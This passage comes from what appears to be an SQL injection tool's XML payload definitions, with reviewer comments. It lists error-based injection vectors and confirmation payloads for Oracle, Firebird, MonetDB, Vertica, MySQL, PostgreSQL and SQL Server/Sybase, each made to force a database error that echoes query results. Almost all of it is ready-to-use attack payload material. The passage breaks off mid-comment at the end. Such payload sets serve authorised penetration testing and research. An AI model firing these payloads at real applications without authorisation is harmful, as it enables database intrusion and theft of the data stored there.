ACL denial presumably fails without echoing the argument (confirm). OR-based, so the
payload alters which rows the original statement matches; hence risk 3 / where 2.
-->
<title > Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
<stype > 2</stype>
<level > 2</level>
<risk > 3</risk>
<clause > 1,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
<dbms_version > > = 8.1.6</dbms_version>
</details>
</test>
<test >
<!--
Oracle, AND variant. CTXSYS.DRITHSX.SN() belongs to the Oracle Text component; the
invalid call raises an error whose message echoes the second argument, i.e. the
delimited value. [RANDNUM] in the first position is just an arbitrary numeric argument.
Only usable where Oracle Text is installed and the CTXSYS package is callable by the
injected user (presumably why this sits at level 3; confirm).
-->
<title > Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<!--
Oracle, OR variant of the CTXSYS.DRITHSX.SN() technique (Oracle Text must be installed
and callable). The error raised by the invalid call echoes the second argument, which
carries the delimited value. OR-based, so risk 3 / where 2: the payload changes which
rows the original statement matches.
-->
<title > Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<!--
Oracle, AND variant. DBMS_UTILITY.SQLID_TO_SQLHASH() expects a valid SQL_ID; the
delimited value is not one and the resulting error echoes it.
NOTE(review): no dbms_version bound is declared, although the function is absent from
older releases. Confirm the minimum version and add a <dbms_version> entry as the
UTL_INADDR tests do, so the request is not sent pointlessly to servers lacking it.
-->
<title > Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<!--
Oracle, OR variant of the DBMS_UTILITY.SQLID_TO_SQLHASH() technique: the error raised
for an invalid SQL_ID echoes the delimited value. Same missing <dbms_version> bound as
the AND form (TODO confirm the minimum release). OR-based, so risk 3 / where 2.
-->
<title > Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 3</risk>
<clause > 1,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<!--
Firebird, AND variant. Comparing the integer [RANDNUM] with a string forces a
string-to-integer conversion; the delimited text is not numeric, so the conversion
error echoes it. RDB$DATABASE is Firebird's single-row system table, used here the way
DUAL is used on Oracle. No function call is needed, so there is no privilege
dependency beyond running the query.
-->
<title > Firebird AND error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
<test >
<!--
Firebird, OR variant: the integer-vs-string comparison fails to convert the delimited
text and the conversion error echoes it. OR-based, so risk 3 / where 2 (the payload
alters which rows the original statement matches).
-->
<title > Firebird OR error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
<test >
<!--
MonetDB, AND variant. Same integer-vs-string comparison trick as the Firebird tests:
the failed conversion of the delimited text echoes it. CODE(49)/CODE(48) yield the
characters '1'/'0' (ASCII codes), so the confirmation subquery produces text rather
than an integer; the subquery has no FROM clause, which MonetDB accepts.
-->
<title > MonetDB AND error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MonetDB</dbms>
</details>
</test>
<test >
<!--
MonetDB, OR variant of the integer-vs-string conversion-error technique; CODE(49) and
CODE(48) are '1' and '0'. OR-based, so risk 3 / where 2.
-->
<title > MonetDB OR error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MonetDB</dbms>
</details>
</test>
<test >
<!--
Vertica, AND variant. CAST(... AS NUMERIC) on the delimited text fails with an error
that echoes the input. BITCOUNT(BITSTRING_TO_BINARY('1')) = 1 and ('0') = 0 supply the
confirmation value; the ::varchar cast keeps the concatenation typed as text. Unlike
the other AND/OR tests in this section it is also registered for clause 8 (column
name position, per the payload schema; confirm).
-->
<title > Vertica AND error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,8,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request >
<payload > AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Vertica</dbms>
</details>
</test>
<test >
<!--
Vertica, OR variant of the CAST(... AS NUMERIC) technique: the failed cast echoes the
delimited text. BITCOUNT(BITSTRING_TO_BINARY('1'/'0')) gives 1/0 for confirmation.
OR-based, so risk 3 / where 2.
-->
<title > Vertica OR error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request >
<payload > OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Vertica</dbms>
</details>
</test>
<!--
TODO: if possible, add payload for SQLite, Microsoft Access,
and SAP MaxDB - no known techniques at this time
-->
<!-- End of error - based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->
<!-- Error - based tests - LIMIT clause -->
<test >
<!--
MySQL, LIMIT-clause position. PROCEDURE ANALYSE() is one of the few things that can
legally follow a LIMIT; EXTRACTVALUE() with an XPath expression beginning with '\'
raises an XPath syntax error that echoes the malformed expression, delimiters and
value included.
NOTE(review): PROCEDURE ANALYSE was deprecated in 5.7 and removed in MySQL 8.0, so the
declared ">= 5.1" is only a lower bound; without an upper bound this request is sent
uselessly against current servers. The XPath error text is also truncated (about 32
characters), which limits how much of the value is recovered per request (confirm).
-->
<title > MySQL > = 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
<stype > 2</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>
<request >
<payload > PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<!-- End of error - based tests - LIMIT clause -->
<!-- Error - based tests - Parameter replace -->
<test >
<!--
MySQL, parameter-replace position (where 3: the whole parameter value is substituted).
2 * 8446744073709551610 exceeds the BIGINT UNSIGNED maximum, so the server raises a
"value is out of range" error whose message echoes the evaluated expression, including
the derived table that holds the delimited value. Both IF() branches are the same
constant, so the overflow happens whatever the condition is; the trailing 'x' in the
CONCAT keeps the derived value from being read as a number. The commented-out payloads
below are equivalent confirmation variants kept for reference.
NOTE(review): later 5.5/5.6/5.7 maintenance releases stopped echoing the offending
expression in out-of-range errors, so ">= 5.5" alone overstates applicability. Confirm
against the target version before trusting a negative result.
-->
<title > MySQL > = 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 3</where>
<vector > (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request >
<!-- These work as good as ELT(), but are longer
<payload > (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
<payload > (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
-->
<payload > (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.5</dbms_version>
</details>
</test>
<test >
<!--
MySQL, parameter replace. Bitwise NOT (~) of the derived-table value yields a very
large unsigned integer and EXP() of it overflows DOUBLE; the resulting out-of-range
error echoes the expression together with the delimited value. ELT(cond,1) returns 1
when the condition is true and NULL otherwise, which is what the confirmation step
looks for.
NOTE(review): as with the BIGINT UNSIGNED variant, newer 5.5/5.6/5.7 maintenance
releases no longer echo the expression in this error; verify on the target.
-->
<title > MySQL > = 5.5 error-based - Parameter replace (EXP)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 3</where>
<vector > EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request >
<payload > EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.5</dbms_version>
</details>
</test>
<test >
<!--
MySQL 5.7.8+ (the first release with the JSON functions), parameter replace.
JSON_KEYS() on text that is not valid JSON raises an "Invalid JSON text" error that
echoes the offending string, so the delimited value comes back in the response.
CONVERT(... USING utf8) forces a predictable character set for the echoed text.
-->
<title > MySQL > = 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 3</where>
<vector > JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>
<request >
<payload > JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.7.8</dbms_version>
</details>
</test>
<test >
<!--
MySQL, parameter replace, the classic FLOOR(RAND(0)*2) duplicate-key technique. With a
fixed seed RAND(0) yields a deterministic sequence that makes the GROUP BY key collide
during aggregation, and the "Duplicate entry ... for key" error echoes the key, i.e.
the delimited value. The grouping needs a source with at least three rows;
INFORMATION_SCHEMA.PLUGINS is used because it is always present and readable. The
commented-out payloads are equivalent confirmation variants.
NOTE(review): the PLUGINS table presumably appeared in 5.1, which does not match the
declared ">= 5.0"; the MySQL >= 4.1 FLOOR test avoids the dependency with a UNION-built
derived table. Confirm and align the version bound.
-->
<title > MySQL > = 5.0 error-based - Parameter replace (FLOOR)</title>
<stype > 2</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 3</where>
<vector > (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
<request >
<!-- These work as good as ELT(), but are longer
<payload > (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
<payload > (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
-->
<payload > (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
<test >
<!--
MySQL 5.1+, parameter replace. UPDATEXML() is handed an XPath expression that starts
with '.' immediately followed by the delimiters, which is malformed, so the XPath
syntax error echoes it. [RANDNUM] and [RANDNUM1] are throwaway XML-fragment and
replacement arguments. The XPath error text is truncated (about 32 characters), so
only a short window of the value is recovered per request (confirm). The commented-out
payloads are equivalent confirmation variants.
-->
<title > MySQL > = 5.1 error-based - Parameter replace (UPDATEXML)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 3</where>
<vector > (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
<request >
<!-- These work as good as ELT(), but are longer
<payload > (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
<payload > (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
-->
<payload > (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<test >
<!--
MySQL 5.1+, parameter replace. EXTRACTVALUE() with an XPath expression beginning with
'\' is malformed, so the XPath syntax error echoes the expression, delimiters and value
included; [RANDNUM] is a throwaway XML-fragment argument. As with UPDATEXML, the error
text is truncated (about 32 characters), limiting the bytes recovered per request
(confirm). The commented-out payloads are equivalent confirmation variants.
-->
<title > MySQL > = 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 3</where>
<vector > (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
<request >
<!-- These work as good as ELT(), but are longer
<payload > (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
<payload > (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>
-->
<payload > (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<test >
<!--
PostgreSQL, parameter replace. CAST(... AS NUMERIC) on text that is not a number fails
with "invalid input syntax for type numeric" and the message quotes the whole input, so
the delimited value is echoed. The ::text cast makes the concatenation type-check
regardless of the result type of [QUERY].
-->
<title > PostgreSQL error-based - Parameter replace</title>
<stype > 2</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 3</where>
<vector > (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request >
<payload > (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<!--
PostgreSQL, parameter replace, alternative confirmation payload. The vector is the same
CAST(... AS NUMERIC) echo as the plain PostgreSQL parameter-replace test; only the
confirmation differs. GENERATE_SERIES with step 1 (condition true) yields a row and the
cast error echoes "1"; with step 0 (condition false) GENERATE_SERIES itself raises an
error first, so the delimiters never appear. Being a fallback it is scheduled at level 5.
-->
<title > PostgreSQL error-based - Parameter replace (GENERATE_SERIES)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 3</where>
<vector > (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request >
<payload > (CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<!--
Microsoft SQL Server / Sybase, parameter replace. CONVERT(INT, ...) of a non-numeric
string fails with "Conversion failed when converting the varchar value '...' to data
type int", which echoes the delimited value. The confirmation payload uses the string
literals '1'/'0' so the whole concatenation stays varchar.
NOTE(review): the <os>Windows</os> detail is a hint only; SQL Server on Linux and
Sybase on Unix would presumably still be affected. Confirm how consumers use it.
-->
<title > Microsoft SQL Server/Sybase error-based - Parameter replace</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
<request >
<payload > (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<!--
Microsoft SQL Server / Sybase, parameter replace without an explicit CONVERT. It relies
on the replaced parameter feeding an integer column: the server then converts the
string implicitly, fails, and echoes the delimited value in the conversion error. Useless
against string columns, which is why it sits one level above the CONVERT variant.
-->
<title > Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
<request >
<payload > (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<!--
Oracle, parameter replace, XMLType technique: "<:" ... ">" around the delimited value
is not a well-formed element, so XMLType() raises a parsing error echoing the text.
Spaces, '$' and '@' are swapped for placeholder tokens before the value is printed.
NOTE(review): the WHERE/HAVING AND variant of this technique also replaces '#'
([HASH_REPLACE]); this vector does not, so values containing '#' may be truncated.
Confirm whether that is intentional.
-->
<title > Oracle error-based - Parameter replace</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request >
<payload > (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<!--
Firebird, parameter replace: the integer-vs-string comparison forces a conversion of
the delimited text that fails and echoes it (same mechanism as the Firebird WHERE
tests).
NOTE(review): the outer SELECT has no FROM clause and places a comparison in the
select list; the WHERE variants use "FROM RDB$DATABASE" for the inner query. Confirm
that this vector parses on the Firebird versions in scope (older releases presumably
reject both constructs).
-->
<title > Firebird error-based - Parameter replace</title>
<stype > 2</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
<request >
<payload > (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
<!-- End of error - based tests - Parameter replace -->
<!-- Error - based tests - ORDER BY, GROUP BY clause -->
<test >
<!--
MySQL, ORDER BY / GROUP BY position. The leading comma appends the expression as an
extra sort/group key; the (SELECT [RANDNUM] FROM (...)x) wrapper turns the overflowing
expression into a scalar subquery that is legal in that position. 2 * 8446744073709551610
exceeds the BIGINT UNSIGNED maximum, and the out-of-range error echoes the expression
with the delimited value. Both IF() branches are the same constant, so the overflow
happens regardless of the condition.
NOTE(review): later 5.5/5.6/5.7 maintenance releases no longer echo the expression in
this error; ">= 5.5" alone overstates applicability (verify on the target).
-->
<title > MySQL > = 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)</vector>
<request >
<payload > ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.5</dbms_version>
</details>
</test>
<test >
<!--
MySQL, ORDER BY / GROUP BY position, EXP() overflow variant. The leading comma appends
an extra sort/group key; EXP(~derived_value) overflows DOUBLE and the out-of-range
error echoes the expression with the delimited value. Same caveat as the other EXP /
BIGINT tests: newer 5.5/5.6/5.7 maintenance releases stopped echoing the expression
